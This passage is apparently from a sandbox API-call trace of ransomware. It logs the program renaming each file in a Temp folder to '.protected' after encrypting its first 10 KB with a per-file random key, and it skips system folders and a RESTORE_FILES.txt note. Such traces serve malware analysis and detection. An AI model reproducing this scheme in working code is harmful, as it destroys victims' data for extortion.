StrStrW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".rar") returned 0x0 [0086.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.845] StrStrW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".zip") returned 0x0 [0086.845] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.845] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0086.846] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.846] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.846] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.846] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.846] CloseHandle (hObject=0xd8) returned 1 [0086.847] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp.protected") returned 80 [0086.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ljdeizip4zlwh.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ljdeizip4zlwh.bmp.protected")) returned 1 [0086.849] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="Windows") returned -1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="Program Files") returned -1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="Program Files (x86)") returned -1 [0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="$Recycle.bin") returned 1 
[0086.849] lstrcmpiW (lpString1="mSFM2TxD.pdf", lpString2="System Volume Information") returned -1 [0086.849] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.849] StrStrIW (lpFirst="mSFM2TxD.pdf", lpSrch=".protected") returned 0x0 [0086.849] lstrcmpW (lpString1="mSFM2TxD.pdf", lpString2="RESTORE_FILES.txt") returned -1 [0086.849] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.849] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\msfm2txd.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.850] StrStrW (lpFirst="mSFM2TxD.pdf", lpSrch=".txt") returned 0x0 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.850] StrStrW (lpFirst="mSFM2TxD.pdf", lpSrch=".rar") returned 0x0 [0086.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf") returned 65 [0086.850] StrStrW (lpFirst="mSFM2TxD.pdf", lpSrch=".zip") returned 0x0 [0086.850] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.851] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.851] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.851] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.852] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.852] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.852] CloseHandle (hObject=0xd8) returned 1 [0086.852] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf.protected") returned 75 [0086.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\msfm2txd.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mSFM2TxD.pdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\msfm2txd.pdf.protected")) returned 1 [0086.854] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="Windows") returned -1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="Program Files") returned -1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="Program Files (x86)") returned -1 
[0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="$Recycle.bin") returned 1 [0086.854] lstrcmpiW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="System Volume Information") returned -1 [0086.854] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.854] StrStrIW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".protected") returned 0x0 [0086.854] lstrcmpW (lpString1="mTNvodTweqYxgd8NuJ.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.854] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mtnvodtweqyxgd8nuj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.855] StrStrW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".txt") returned 0x0 [0086.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.855] StrStrW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".rar") returned 0x0 [0086.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp") returned 75 [0086.855] StrStrW (lpFirst="mTNvodTweqYxgd8NuJ.bmp", lpSrch=".zip") returned 0x0 [0086.855] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.856] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.856] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.856] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.857] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.857] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.857] CloseHandle (hObject=0xd8) returned 1 [0086.857] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp.protected") returned 85 [0086.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mtnvodtweqyxgd8nuj.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mTNvodTweqYxgd8NuJ.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mtnvodtweqyxgd8nuj.bmp.protected")) returned 1 [0086.859] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.859] lstrcmpiW 
(lpString1="NgnQ0H Oycy.mp3", lpString2="Windows") returned -1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="Program Files") returned -1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="Program Files (x86)") returned -1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="$Recycle.bin") returned 1 [0086.859] lstrcmpiW (lpString1="NgnQ0H Oycy.mp3", lpString2="System Volume Information") returned -1 [0086.859] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 [0086.859] StrStrIW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".protected") returned 0x0 [0086.859] lstrcmpW (lpString1="NgnQ0H Oycy.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0086.859] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.859] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ngnq0h oycy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 [0086.860] StrStrW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".txt") returned 0x0 [0086.860] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 [0086.860] StrStrW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".rar") returned 0x0 [0086.860] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3") returned 68 
[0086.860] StrStrW (lpFirst="NgnQ0H Oycy.mp3", lpSrch=".zip") returned 0x0 [0086.860] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.861] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.861] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.861] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.861] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.861] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.861] CloseHandle (hObject=0xd8) returned 1 [0086.862] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3.protected") returned 78 [0086.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ngnq0h oycy.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\NgnQ0H Oycy.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ngnq0h oycy.mp3.protected")) returned 1 [0086.864] 
FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="Windows") returned -1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="Program Files") returned -1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="Program Files (x86)") returned -1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="$Recycle.bin") returned 1 [0086.864] lstrcmpiW (lpString1="O37HQOVWk.avi", lpString2="System Volume Information") returned -1 [0086.864] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.864] StrStrIW (lpFirst="O37HQOVWk.avi", lpSrch=".protected") returned 0x0 [0086.864] lstrcmpW (lpString1="O37HQOVWk.avi", lpString2="RESTORE_FILES.txt") returned -1 [0086.864] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.864] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\o37hqovwk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.864] StrStrW (lpFirst="O37HQOVWk.avi", lpSrch=".txt") returned 0x0 [0086.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.864] StrStrW (lpFirst="O37HQOVWk.avi", lpSrch=".rar") returned 0x0 [0086.864] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi") returned 66 [0086.865] StrStrW (lpFirst="O37HQOVWk.avi", lpSrch=".zip") returned 0x0 [0086.865] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.865] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.865] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.866] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.866] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.866] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.866] CloseHandle (hObject=0xd8) returned 1 [0086.867] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi.protected") returned 76 [0086.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\o37hqovwk.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\O37HQOVWk.avi.protected" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\o37hqovwk.avi.protected")) returned 1 [0086.868] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="Windows") returned -1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="Program Files") returned -1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="Program Files (x86)") returned -1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="$Recycle.bin") returned 1 [0086.868] lstrcmpiW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="System Volume Information") returned -1 [0086.868] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.868] StrStrIW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", lpSrch=".protected") returned 0x0 [0086.868] lstrcmpW (lpString1="oDE5vXHnCSjoYziwyf.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0086.868] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.868] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ode5vxhncsjoyziwyf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.869] StrStrW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", lpSrch=".txt") returned 0x0 
[0086.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.869] StrStrW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", lpSrch=".rar") returned 0x0 [0086.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.869] StrStrW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", lpSrch=".zip") returned 0x0 [0086.869] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.870] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.870] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.871] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.871] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.871] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.871] CloseHandle (hObject=0xd8) returned 1 [0086.871] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv.protected") returned 85 [0086.871] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
